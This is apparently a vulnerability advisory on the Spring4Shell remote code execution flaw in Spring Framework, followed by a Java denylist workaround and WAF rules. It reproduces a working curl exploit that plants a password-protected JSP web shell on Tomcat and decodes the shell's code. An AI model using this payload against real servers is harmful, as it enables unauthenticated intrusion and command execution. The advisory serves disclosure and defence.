Category: Vulnerability Intelligence | Vulnerability Class: Remote code execution | CVE ID: To be assigned | CVSS:3.0 Score: To be assigned
About Spring Framework

The Spring Framework is an open-source application framework that provides infrastructure support for developing Java applications. It is the most widely used lightweight open-source Java framework and underpins much of enterprise Java development. Java, Spring Boot, Auth0, Bugsnag and Java EE are among the tools commonly integrated with Spring, and 544 companies, including Accenture and Zalando, reportedly use it in their tech stacks.

Exploitation

To exploit the vulnerability, the request must reach a handler whose parameters Spring binds onto an object through the DataBinder (for example a controller method that takes a form or command object as an argument). In some cases all an attacker needs is a single specially crafted HTTP request to the vulnerable system; other configurations require extra research to develop a working payload.

On Successful Exploitation

Threat actors can use these exploits to run commands on the server, giving them initial access to the host.
Mass Scanning

Because exploitation is a single HTTP POST to a vulnerable application, threat actors can readily write scripts that crawl the Internet and exploit susceptible servers automatically.
Note: The Java Spring Core zero-day dubbed "Spring4Shell" is unrelated to the other vulnerabilities disclosed in the Spring ecosystem this week, namely the Spring Framework SpEL denial-of-service vulnerability (CVE-2022-22950) and the Spring Cloud Function SpEL expression resource access vulnerability (CVE-2022-22963).
The proof-of-concept exploit released publicly for Spring4Shell, as shared in posts by several researchers, is reproduced below:
Proof of Concept (Exploit)
curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7
This request drops a password-protected web shell named tomcatwar.jsp into Tomcat's ROOT web application (webapps/ROOT). Decoded, the JSP written to disk is:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

The three "-" characters are where Tomcat's access-log pattern expanded %{c2}i, %{c1}i and %{suffix}i: %{name}i writes the value of the named request header and prints "-" when that header is absent. Public exploit scripts send those headers (c2 carrying the JSP opening tag, c1 carrying the word Runtime and suffix carrying the closing tag) so that the most recognisable parts of the shell never appear in the URL-encoded body; the curl above omits them, which is why the placeholders show up. Once the file is in place, a request to /tomcatwar.jsp with pwd=j and a cmd parameter runs the given command and returns its output.

The payload is Tomcat-specific. Each parameter name is a Spring DataBinder property path: class.module.classLoader walks from the bound object's java.lang.Class to its Module and from there to the web application's class loader, and .resources.context.parent.pipeline.first reaches the AccessLogValve that sits first in the host's valve pipeline. Setting that valve's pattern, suffix, directory, prefix and fileDateFormat properties redirects the access log into a file named tomcatwar.jsp under webapps/ROOT whose contents are the attacker's JSP.
Applications running on JDK 9 or newer are exposed to this RCE. The reason is the property path itself: Spring has blocked the class.classLoader path since CVE-2010-1622, but JDK 9 added java.lang.Class.getModule(), and Module exposes getClassLoader(), so class.module.classLoader reaches the same class loader through a path the old block does not cover. All versions of Spring Core are said to be impacted.

At the time of writing there is no official patch from Spring, so threat actors can exploit the vulnerability for unauthenticated remote code execution. (Spring has since assigned CVE-2022-22965 and shipped the fix in Spring Framework 5.3.18 and 5.2.20.) Given the ease of exploitation, large-scale exploitation on the pattern of Log4j is to be expected, and a foothold gained this way can be used to deploy malware or ransomware inside an organisation.
Spring's DataBinder can be told to refuse property names that match given patterns. As a temporary mitigation, create a ControllerAdvice component (a Spring component shared across all controllers) whose @InitBinder method adds the dangerous patterns to the binder's disallowed-field denylist.
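The denylist workaround described above, written out as an added example (this is not CloudSEK's, Rapid7's or Spring's own code). It registers the four patterns that the WAF guidance below also filters on, and adds a stand-alone check that a DataBinder carrying the denylist actually suppresses the class.module.classLoader path used by the Tomcat payload. It assumes spring-beans, spring-core and spring-web 5.x on the classpath; the com.example.hardening package and the Greeting bean are illustrative.

```java
// Added example (not CloudSEK's, Rapid7's or Spring's own code): the DataBinder denylist
// workaround for Spring4Shell, plus a stand-alone check that the denylist suppresses the
// property path the Tomcat payload relies on. Assumes spring-beans, spring-core and
// spring-web 5.x on the classpath; the package and the Greeting bean are illustrative.
package com.example.hardening;

import org.springframework.beans.MutablePropertyValues;
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.validation.DataBinder;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE)
public class BinderControllerAdvice {

    // Patterns are matched against the full property path with Spring's simple
    // wildcard matching: "class.*" catches "class.module.classLoader.resources...",
    // and "*.class.*" catches the same traversal started from a nested property
    // such as "owner.class.module...". The capitalised forms cover "Class." spellings.
    static final String[] DENYLIST = {"class.*", "Class.*", "*.class.*", "*.Class.*"};

    // Runs for every controller's WebDataBinder before request parameters are bound.
    @InitBinder
    public void denyClassLoaderPaths(WebDataBinder dataBinder) {
        dataBinder.setDisallowedFields(DENYLIST);
    }

    /** Illustrative form-backing bean, standing in for any @ModelAttribute argument. */
    public static class Greeting {
        private String name;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
    }

    /**
     * Binds the given parameter names onto a Greeting with the denylist applied and
     * returns the names the binder refused. Disallowed fields are dropped and recorded
     * before any property traversal happens, so the class loader is never reached.
     */
    public static String[] suppressedFields(String... parameterNames) {
        DataBinder binder = new DataBinder(new Greeting());
        binder.setDisallowedFields(DENYLIST);
        MutablePropertyValues values = new MutablePropertyValues();
        for (String parameterName : parameterNames) {
            values.add(parameterName, "x");
        }
        binder.bind(values);
        return binder.getBindingResult().getSuppressedFields();
    }

    public static void main(String[] args) {
        String[] suppressed = suppressedFields(
                "name",
                "class.module.classLoader.resources.context.parent.pipeline.first.pattern",
                "Class.module.classLoader.resources.context.parent.pipeline.first.suffix");
        // The two class-loader paths are reported as suppressed; "name" binds normally.
        for (String field : suppressed) {
            System.out.println("suppressed: " + field);
        }
    }
}
```

Two things to check before relying on this. setDisallowedFields replaces the binder's whole disallowed list rather than appending to it, so any controller that declares its own @InitBinder method calling setDisallowedFields overrides this advice for that controller and must include the same four patterns. And the advice is a stopgap: it only protects parameter binding, so it should be removed in favour of upgrading once a fixed Spring Framework release is deployed.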
On network protection devices such as a WAF, add rules that block request parameters whose names match "class.*", "Class.*", "*.class.*" and "*.Class.*", tuned to the real traffic of the deployed services so that legitimate parameters are not dropped. Spring4Shell works entirely through such parameter names: every step of the exploit is a DataBinder property path that begins with class. or Class. and walks through the class loader, so filtering those names removes the attacker's way in. The names may arrive URL-encoded, in a POST body or in the query string, so the rule must be applied after the request has been decoded.
Lastly, stay up to date with Spring's official releases and apply the patches as soon as they are available.